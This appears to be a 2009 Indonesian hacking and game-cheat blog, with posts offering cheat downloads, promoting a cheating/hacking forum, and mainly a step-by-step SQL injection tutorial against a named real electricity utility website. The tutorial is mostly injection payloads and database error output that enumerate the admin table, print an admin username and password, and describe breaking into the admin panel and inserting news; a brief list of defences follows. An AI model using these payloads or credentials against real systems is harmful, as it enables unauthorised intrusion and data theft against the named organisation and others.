Selain cara diatas (dikombinasikan) jika terjadi lelet terutama pd saat browsing, bisa dilakukan sbagai brikut :

1. Setting Proxy pd FF dikembalikan ke NO PROXY ( setting MANUAL
PROXY usah dihapus, centang aja di NO PROXY)

2, Setting MODEM ADSL pd bag. DNS PROXY sbgai brikut :
PRIMARY DNS : 208.67.222.222
SECONDARY DNS : 208.67.220.220

3. Setting utk DONLOT pd IDM tetap pake PROXY spt diatas.

4. Udh gw coba browsing pd situs yg banyak open imagenya

Super Chance Audition

2009-07-20T02:34:00.000-07:00

neh yg mau coba Super Chance..!
silahkan download di sini

untuk password'a..

Password : taikuda

Cheat Tantra Kathana 4

2009-07-20T01:26:00.000-07:00

Huh...
w kesel bgt, coz char tantra w di kill org yg pke cheat..!!
emg kga adil tuh.. dia cheat.. sedangkan w kga..
sama az 1:100
ck..ck...

saat na w blz dendam..!!

akhir'a Cheat TANTRA w temukan..!!
WORK 1000%..

w kga mau berbnyak bacotan lgi ah..
nih link download cheat'a..

CHEAT TANTRA KATHANA 4

Password'a HUB via Email w : sakaw94@gmail.com

Thx

INDONESIAN CLOSER COMMUNITY

2009-07-20T00:33:00.000-07:00

sebuah forum yg membahas cheat, hacking dll..
yg ingin download cheat atau ingin belajar hacking..
silahkan dftar di sini..

Just for Share & learn..!!

INDONESIAN CLOSER COMMUNITY..

Sql Injection ala newbie

2009-07-18T22:05:00.000-07:00

Akhir-akhir ini, anda sering mendengar istilah "SQL Injection" ?
Anda tahu betapa berbahaya bug yang satu ini ?
Berikut akan kita sajikan step by step SQL Injection ini.
Catatan : kita akan membatasi bahasan pada SQL Injection
di MS-SQL Server.

Kita akan mengambil contoh di site www.pln-wilkaltim.co.id
Ada dua kelemahan di site ini, yaitu:
1. Tabel News
2. Tabel Admin

Langkah pertama, kita tentukan lubang mana yang bisa di-inject
dengan jalan berjalan-jalan (enumeration) dulu di site tsb.
Kita akan menemukan 2 model cara input parameter, yaitu dengan
cara memasukkan lewat input box dan memasukkannya lewat
alamat URL.

Kita ambil yang termudah dulu, dengan cara input box.
Kemudian kita cari kotak login yang untuk admin.
Ketemu di www.pln-wilkaltim.co.id/sipm/admin/admin.asp
Langkah pertama untuk menentukan nama tabel dan fieldnya,
kita inject kotak NIP dengan perintah (password terserah, cabang
biarkan aja):
' having 1=1--
jangan lupa untuk menuliskan tanda kutip tunggal dan tanda
minus dobel (penting).
Arti kedua tanda tsb bisa anda cari di tutorial SQL Injection
di www.neoteker.or.id ini (lihat arsip sebelumnya).
Kemudian akan keluar pesan error:

--------------------
Microsoft OLE DB Provider for ODBC Drivers (0x80040E14)
[Microsoft][ODBC SQL Server Driver][SQL Server]Column
'T_ADMIN.NOMOR' is invalid in the select list because
it is not contained in an aggregate function and
there is no GROUP BY clause.
/sipm/admin/dologin.asp, line 7
--------------------
Keluarlah nama field pertama kita !!!
Catat nama tabel : T_ADMIN
Catat nama field : NOMOR

Kemudian kita akan mencari nama field-field berikutnya,
beserta nama tabel yang mungkin berbeda-beda.
Kita inject di kotak NIP (password terserah):
' group by T_ADMIN.NOMOR having 1=1--
Akan keluar pesan error:
--------------------
Microsoft OLE DB Provider for ODBC Drivers (0x80040E14)
[Microsoft][ODBC SQL Server Driver][SQL Server]Column
'T_ADMIN.NIP' is invalid in the select list because
it is not contained in either an aggregate
function or the GROUP BY clause.
/sipm/admin/dologin.asp, line 7
--------------------
Artinya itulah nama tabel dan field kedua kita.
Catat : T_ADMIN.NIP

Kemudian kita cari field ke tiga :
' group by T_ADMIN.NOMOR,T_ADMIN.NIP having 1=1--
Akan keluar pesan error:
--------------------
Microsoft OLE DB Provider for ODBC Drivers (0x80040E14)
[Microsoft][ODBC SQL Server Driver][SQL Server]Column
'T_ADMIN.PASSWORD' is invalid in the select list because
it is not contained in either an aggregate
function or the GROUP BY clause.
/sipm/admin/dologin.asp, line 7
--------------------
Catat field ke tiga : T_ADMIN.PASSWORD

Lakukan langkah di atas sampai kita menemukan field terakhir.

Berikut adalah pesan error yang terjadi, jika kita mengecek
field terakhir dengan meng-inject:
' group by T_ADMIN.NOMOR,T_ADMIN.NIP,T_ADMIN.PASSWORD,
T_ADMIN.NAMA,T_ADMIN.KD_RANTING,T_ADMIN.ADDRESS,T_ADMIN.EMAIL
having 1=1--
(catatan : kalimat harus 1 baris, tidak dipotong)
--------------------
- NIP atau Password atau Unit Anda salah !! -
--------------------
Sukses !!! Kita berhasil menemukan field terakhir.
Daftar kolom (field):
T_ADMIN.NOMOR
T_ADMIN.NIP
T_ADMIN.PASSWORD
T_ADMIN.NAMA
T_ADMIN.KD_RANTING
T_ADMIN.ADDRESS
T_ADMIN.EMAIL
Hanya ada satu tabel untuk otentifikasi ini (yaitu T_ADMIN),
ini akan mempermudah proses kita selanjutnya.

Langkah berikutnya, kita menentukan jenis struktur field-
field tersebut di atas.

Kita inject di kotak NIP (pass terserah) :
' union select sum(NOMOR) from T_ADMIN--
Arti dari query tersebut adalah : kita coba menerapkan
klausa sum sebelum menentukan apakah jumlah kolom-kolom
di dua rowsets adalah sejenis.
Bahasa mudahnya adalah kita memasukkan klausa sum (jumlah)
yang berlaku untuk type kolom numerik, jadi untuk type kolom
yang bukan numerik, akan keluar error yang bisa memberitahu
kita jenis kolom yang dimaksud.
Pesan error :
--------------------
Microsoft OLE DB Provider for ODBC Drivers (0x80040E14)
[Microsoft][ODBC SQL Server Driver][SQL Server]All queries
in an SQL statement containing a UNION operator must have
an equal number of expressions in their target lists.
/sipm/admin/dologin.asp, line 7
--------------------
artinya kolom NOMOR berjenis numerik.

Berikutnya kita inject :
' union select sum(NIP) from T_ADMIN--
Akan keluar pesan error :
--------------------
Microsoft OLE DB Provider for ODBC Drivers (0x80040E07)
[Microsoft][ODBC SQL Server Driver][SQL Server]The sum
or average aggregate operation cannot take a char data
type as an argument.
/sipm/admin/dologin.asp, line 7
--------------------
Artinya kolom NIP bertype char.

Kita harus mengulang perintah di atas untuk kolom yang
berikutnya dengan jalan mengganti nama_kolom di :
' union select sum(nama_kolom) from T_ADMIN--
dengan kolom yang berikutnya.
Kita peroleh 7 type kolom:
T_ADMIN.NOMOR => numeric
T_ADMIN.NIP => char
T_ADMIN.PASSWORD => nvarchar
T_ADMIN.NAMA => char
T_ADMIN.KD_RANTING => char
T_ADMIN.ADDRESS => nvarchar
T_ADMIN.EMAIL => char

Langkah berikutnya, kita akan mencari isi kolom password,
untuk user admin, dengan meng-inject :
' union select min(NAMA),1,1,1,1,1,1 from T_ADMIN where NAMA > 'a'--
artinya kita memilih minimum nama user yang lebih besar dari 'a'
dan mencoba meng-konvert-nya ke tipe integer.
Arti angka 1 sebanyak 6 kali itu adalah bahwa kita hanya memilih
kolom NAMA, dan mengabaikan 6 kolom yang lain.
Akan keluar pesan error :
--------------------
Microsoft OLE DB Provider for ODBC Drivers (0x80040E07)
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax
error converting the varchar value 'bill ' to
a column of data type int.
/sipm/admin/dologin.asp, line 7
--------------------
Anda lihat :
varchar value 'bill '
'bill' itu adalah nama user di record yang terakhir dimasukkan,
atau isi kolom NAMA di record yang terakhir dimasukkan.

Selanjutnya kita inject :
' union select min(PASSWORD),1,1,1,1,1,1 from T_ADMIN where
NAMA = 'bill'--
catatan : harus sebaris (tidak dipotong).
Akan keluar error :
---------------------
Microsoft OLE DB Provider for ODBC Drivers (0x80040E07)
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax
error converting the nvarchar value 'm@mpusk@u' to a
column of data type int.
/sipm/admin/dologin.asp, line 7
---------------------
Artinya kita berhasil !!!
Kita dapatkan
[+] NAMA = bill
[+] PASSWORD = m@mpusk@u

Silahkan login ke :
www.pln-wilkaltim.co.id/sipm/admin/admin.asp
dengan account di atas, sedang nama cabang, silahkan anda
isi sendiri dengan cara coba-coba

Atau kita pakai jalan pintas saja....

Kita inject-kan :
' union select min(KD_RANTING),1,1,1,1,1,1 from T_ADMIN
where NAMA ='bill'--
catatan : harus satu baris.
Duarrrrrr..........
Glhodhak.............
Langsung masuk ke menu admin.
Ingat : jangan buat kerusakan ! beritahu sang admin !!!

Lubang ke dua adalah pada bagian berita.
Pada dasarnya berita di situ adalah isi dari tabel yang
lain lagi. Jadi tetep bisa kita inject !!!
Bedanya, kita harus memasukkan parameter di alamat URL-nya.
Contoh :
www.pln-wilkaltim.co.id/dari_Media.asp?id=2119&idm=40&idSM=2
ada parameter id dan idSM.
Setelah kita coba inject, ternyata yang berpengaruh adalah
parameter id aja (CMIIW).

Kita inject-kan :
www.pln-wilkaltim.co.id/dari_Media.asp?id=2119' having 1=1--
akan keluar pesan error :
---------------------------
Microsoft OLE DB Provider for ODBC Drivers (0x80040E14)
[Microsoft][ODBC SQL Server Driver][SQL Server]Column
'tb_news.NewsId' is invalid in the select list because
it is not contained in an aggregate function and
there is no GROUP BY clause.
/dari_Media.asp, line 58
---------------------------
artinya 'tb_news.NewsId' itulah nama tabel dan kolom kita
yang pertama.

Ulangi langkah-langkah kita di atas sampai didapatkan :
tb_news.NewsId => numeric
tb_news.NewsCatId => numeric
tb_news.EntryDate => datetime
tb_news.Title => nvarchar
tb_news.Content =>
tb_news.FotoLink =>
tb_news.FotoType => bit data
tb_news.review =>
tb_news.sumber => char
tb_news.dateagenda => datetime

Nah, selanjutnya adalah tugas anda sendiri untuk mengembangkan
pengetahuan anda.
Anda bisa men-insert berita yang bisa anda tentukan sendiri
isinya.

Inilah mengapa hole di MS-SQL Server ini demikian berbahaya.

Perkiraan saya, nama-nama partai di situs KPU yang di-hack
oleh Shizoprenic, juga ada di tabel-tabel suatu database,
jadi tetep bisa dimasuki dengan cara SQL Injection ini.

******************************************************
KHUSUS BUAT ADMIN & WEB PROGRAMMER !!!
******************************************************
Cara pencegahan yang umum digunakan :
1. Batasi panjang input box (jika memungkinkan), dengan
cara membatasinya di kode program, jadi si cracker pemula
akan bingung sejenak melihat input box nya gak bisa di
inject dengan perintah yang panjang.
2. Filter input yang dimasukkan oleh user, terutama penggunaan
tanda kutip tunggal (Input Validation).
3. Matikan atau sembunyikan pesan-pesan error yang keluar
dari SQL Server yang berjalan.
4. Matikan fasilitas-fasilitas standar seperti Stored Procedures,
Extended Stored Procedures jika memungkinkan.
5. Ubah "Startup and run SQL Server" menggunakan low privilege user
di SQL Server Security tab.

Yah itulah mungkin yang dapat saya ceritakan.....
Hal itu adalah gambaran, betapa tidak amannya dunia internet...
Kalau mau lebih aman, copot kabel jaringan anda, copot disk
drive anda, copot harddisk anda, jual kompie anda !!!
Just kidding )

Referensi :
[+] sqlinjection, www.BlackAngels.it
[+] anvanced sql injection in sql server applications
(www.ngssoftware.com)
[+] sql injection walktrough (www.securiteam.com)

Akhir'a RV pindah ke TS

2009-07-18T19:41:00.000-07:00

Akhir'a blog. Romantic Evil pindah ke Trojan Sakaw...
moga" az di blog baru ini dpt memperbaiki kesalahan di masa lampau... ^^